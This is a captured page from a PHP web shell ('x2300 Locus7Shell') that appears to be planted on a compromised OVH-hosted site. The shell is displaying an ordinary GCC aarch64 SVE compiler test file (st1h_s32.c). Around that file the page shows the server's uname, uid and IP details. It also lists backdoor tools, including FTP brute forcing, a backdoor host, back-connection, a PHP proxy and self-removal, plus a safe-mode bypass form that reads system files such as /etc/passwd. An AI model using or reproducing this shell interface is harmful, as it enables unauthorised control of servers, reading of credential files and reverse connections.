Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/aarch64/sve/acle/asm/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     st1h_s32.c (3.51 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-final { check-function-bodies "**" "" "-DCHECK_ASM" { target { ! ilp32 } } } } */

#include "test_sve_acle.h"

/*
** st1h_s32_base:
**    st1h    z0\.s, p0, \[x0\]
**    ret
*/
TEST_STORE (st1h_s32_base, svint32_t, int16_t,
        svst1h_s32 (p0, x0, z0),
        svst1h (p0, x0, z0))

/*
** st1h_s32_index:
**    st1h    z0\.s, p0, \[x0, x1, lsl 1\]
**    ret
*/
TEST_STORE (st1h_s32_index, svint32_t, int16_t,
        svst1h_s32 (p0, x0 + x1, z0),
        svst1h (p0, x0 + x1, z0))

/*
** st1h_s32_1:
**    st1h    z0\.s, p0, \[x0, #1, mul vl\]
**    ret
*/
TEST_STORE (st1h_s32_1, svint32_t, int16_t,
        svst1h_s32 (p0, x0 + svcntw (), z0),
        svst1h (p0, x0 + svcntw (), z0))

/*
** st1h_s32_7:
**    st1h    z0\.s, p0, \[x0, #7, mul vl\]
**    ret
*/
TEST_STORE (st1h_s32_7, svint32_t, int16_t,
        svst1h_s32 (p0, x0 + svcntw () * 7, z0),
        svst1h (p0, x0 + svcntw () * 7, z0))

/* Moving the constant into a register would also be OK.  */
/*
** st1h_s32_8:
**    incb    x0, all, mul #4
**    st1h    z0\.s, p0, \[x0\]
**    ret
*/
TEST_STORE (st1h_s32_8, svint32_t, int16_t,
        svst1h_s32 (p0, x0 + svcntw () * 8, z0),
        svst1h (p0, x0 + svcntw () * 8, z0))

/*
** st1h_s32_m1:
**    st1h    z0\.s, p0, \[x0, #-1, mul vl\]
**    ret
*/
TEST_STORE (st1h_s32_m1, svint32_t, int16_t,
        svst1h_s32 (p0, x0 - svcntw (), z0),
        svst1h (p0, x0 - svcntw (), z0))

/*
** st1h_s32_m8:
**    st1h    z0\.s, p0, \[x0, #-8, mul vl\]
**    ret
*/
TEST_STORE (st1h_s32_m8, svint32_t, int16_t,
        svst1h_s32 (p0, x0 - svcntw () * 8, z0),
        svst1h (p0, x0 - svcntw () * 8, z0))

/* Moving the constant into a register would also be OK.  */
/*
** st1h_s32_m9:
**    dech    x0, all, mul #9
**    st1h    z0\.s, p0, \[x0\]
**    ret
*/
TEST_STORE (st1h_s32_m9, svint32_t, int16_t,
        svst1h_s32 (p0, x0 - svcntw () * 9, z0),
        svst1h (p0, x0 - svcntw () * 9, z0))

/*
** st1h_vnum_s32_0:
**    st1h    z0\.s, p0, \[x0\]
**    ret
*/
TEST_STORE (st1h_vnum_s32_0, svint32_t, int16_t,
        svst1h_vnum_s32 (p0, x0, 0, z0),
        svst1h_vnum (p0, x0, 0, z0))

/*
** st1h_vnum_s32_1:
**    st1h    z0\.s, p0, \[x0, #1, mul vl\]
**    ret
*/
TEST_STORE (st1h_vnum_s32_1, svint32_t, int16_t,
        svst1h_vnum_s32 (p0, x0, 1, z0),
        svst1h_vnum (p0, x0, 1, z0))

/*
** st1h_vnum_s32_7:
**    st1h    z0\.s, p0, \[x0, #7, mul vl\]
**    ret
*/
TEST_STORE (st1h_vnum_s32_7, svint32_t, int16_t,
        svst1h_vnum_s32 (p0, x0, 7, z0),
        svst1h_vnum (p0, x0, 7, z0))

/* Moving the constant into a register would also be OK.  */
/*
** st1h_vnum_s32_8:
**    incb    x0, all, mul #4
**    st1h    z0\.s, p0, \[x0\]
**    ret
*/
TEST_STORE (st1h_vnum_s32_8, svint32_t, int16_t,
        svst1h_vnum_s32 (p0, x0, 8, z0),
        svst1h_vnum (p0, x0, 8, z0))

/*
** st1h_vnum_s32_m1:
**    st1h    z0\.s, p0, \[x0, #-1, mul vl\]
**    ret
*/
TEST_STORE (st1h_vnum_s32_m1, svint32_t, int16_t,
        svst1h_vnum_s32 (p0, x0, -1, z0),
        svst1h_vnum (p0, x0, -1, z0))

/*
** st1h_vnum_s32_m8:
**    st1h    z0\.s, p0, \[x0, #-8, mul vl\]
**    ret
*/
TEST_STORE (st1h_vnum_s32_m8, svint32_t, int16_t,
        svst1h_vnum_s32 (p0, x0, -8, z0),
        svst1h_vnum (p0, x0, -8, z0))

/* Moving the constant into a register would also be OK.  */
/*
** st1h_vnum_s32_m9:
**    dech    x0, all, mul #9
**    st1h    z0\.s, p0, \[x0\]
**    ret
*/
TEST_STORE (st1h_vnum_s32_m9, svint32_t, int16_t,
        svst1h_vnum_s32 (p0, x0, -9, z0),
        svst1h_vnum (p0, x0, -9, z0))

/* Using MUL to calculate an index would also be OK.  */
/*
** st1h_vnum_s32_x1:
**    cnth    (x[0-9]+)
**    madd    (x[0-9]+), (x1, \1|\1, x1), x0
**    st1h    z0\.s, p0, \[\2\]
**    ret
*/
TEST_STORE (st1h_vnum_s32_x1, svint32_t, int16_t,
        svst1h_vnum_s32 (p0, x0, x1, z0),
        svst1h_vnum (p0, x0, x1, z0))

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0069 ]--